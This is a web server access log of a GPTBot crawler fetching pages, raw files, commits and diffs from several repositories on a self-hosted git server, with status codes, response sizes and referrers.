"/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/asset_pilot_docker.tar.gz" [Client 74.7.227.38] [Length 19909] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/asset_pilot_docker.tar.gz" +[17/Feb/2026:13:38:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 74.7.227.38] [Length 9940] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/MIGRATION_GUIDE.md" +[17/Feb/2026:13:38:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/DOCKER_QUICKSTART.md" [Client 74.7.227.38] [Length 9940] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/DOCKER_QUICKSTART.md" +[17/Feb/2026:13:38:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/claude.md" [Client 74.7.227.38] [Length 9927] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/claude.md" +[17/Feb/2026:13:38:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 71830] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" +[17/Feb/2026:13:38:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 70557] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" +[17/Feb/2026:13:38:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/asset_pilot_orangepi.tar.gz" [Client 74.7.227.38] [Length 9941] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/asset_pilot_orangepi.tar.gz" +[17/Feb/2026:13:38:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/asset_pilot_docker.tar.gz" [Client 74.7.227.38] [Length 9939] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/asset_pilot_docker.tar.gz" +[17/Feb/2026:13:38:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js" [Client 74.7.227.38] [Length 25523] [Gzip 7.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument" +[17/Feb/2026:13:38:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/" [Client 74.7.227.38] [Length 46] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/forks" +[17/Feb/2026:13:38:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver" [Client 74.7.227.38] [Length 14547] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/" +[17/Feb/2026:13:38:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..main?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 558451] [Gzip 13.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..main" +[17/Feb/2026:13:38:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f" [Client 74.7.227.38] [Length 14464] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/18fa480c84b358da8bf50d54057f53591759225f" +[17/Feb/2026:13:38:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host" [Client 74.7.227.38] [Length 10823] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data" +[17/Feb/2026:13:38:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 204108] [Gzip 13.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?show-outdated=&style=unified&whitespace=ignore-all" +[17/Feb/2026:13:38:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 204114] [Gzip 13.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?show-outdated=&style=split&whitespace=ignore-change" +[17/Feb/2026:13:38:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 137900] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:13:38:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 135168] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:13:38:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/static" [Client 74.7.227.38] [Length 10636] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker" +[17/Feb/2026:13:38:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/static" [Client 74.7.227.38] [Length 10669] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker" +[17/Feb/2026:13:38:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js" [Client 74.7.227.38] [Length 9884] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js" +[17/Feb/2026:13:38:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js" [Client 74.7.227.38] [Length 28702] [Gzip 12.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js" +[17/Feb/2026:13:38:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js" [Client 74.7.227.38] [Length 16066] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js" +[17/Feb/2026:13:38:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.gitignore" [Client 74.7.227.38] [Length 11109] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f" +[17/Feb/2026:13:38:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx" [Client 74.7.227.38] [Length 9867] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host" +[17/Feb/2026:13:38:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host" [Client 74.7.227.38] [Length 10150] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host" +[17/Feb/2026:13:38:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..main?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 626459] [Gzip 15.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..main" +[17/Feb/2026:13:38:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 176802] [Gzip 4.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project" +[17/Feb/2026:13:38:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/index.html" [Client 74.7.227.38] [Length 21776] [Gzip 6.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html" +[17/Feb/2026:13:38:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/static" [Client 74.7.227.38] [Length 9901] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/static" +[17/Feb/2026:13:38:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/static" [Client 74.7.227.38] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/static" +[17/Feb/2026:13:38:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47?files=.TemporaryDocument%2fapp.js" [Client 74.7.227.38] [Length 34501] [Gzip 8.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js" +[17/Feb/2026:13:38:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html?display=rendered" [Client 74.7.227.38] [Length 14774] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html" +[17/Feb/2026:13:38:28 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/$%7BgetInvestingUrl(symbol)%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js" +[17/Feb/2026:13:38:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/.gitignore" [Client 74.7.227.38] [Length 119] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.gitignore" +[17/Feb/2026:13:38:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx" [Client 74.7.227.38] [Length 10138] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx" +[17/Feb/2026:13:38:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/.gitignore" [Client 74.7.227.38] [Length 9900] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.gitignore" +[17/Feb/2026:13:38:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/.gitignore" [Client 74.7.227.38] [Length 10161] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.gitignore" +[17/Feb/2026:13:38:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 659895] [Gzip 25.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/controller-cpp.md" +[17/Feb/2026:13:38:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/index.html" [Client 74.7.227.38] [Length 9840] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/index.html" +[17/Feb/2026:13:38:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 10194] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/controller-cpp.md" +[17/Feb/2026:13:38:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/index.html" [Client 74.7.227.38] [Length 17807] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/index.html" +[17/Feb/2026:13:38:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 468113] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/controller-cpp.md" +[17/Feb/2026:13:38:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/main" [Client 74.7.227.38] [Length 10898] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject" +[17/Feb/2026:13:38:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/main" [Client 74.7.227.38] [Length 10897] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject" +[17/Feb/2026:13:38:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/main" [Client 74.7.227.38] [Length 10898] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject" +[17/Feb/2026:13:38:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.6" [Client 74.7.227.38] [Length 35822] [Gzip 6.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs" +[17/Feb/2026:13:38:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.gitignore" [Client 74.7.227.38] [Length 11079] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/.gitignore" +[17/Feb/2026:13:38:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=.gitignore" [Client 74.7.227.38] [Length 23904] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/.gitignore" +[17/Feb/2026:13:38:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.1" [Client 74.7.227.38] [Length 33616] [Gzip 6.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs" +[17/Feb/2026:13:38:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log.5" [Client 74.7.227.38] [Length 33429] [Gzip 6.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 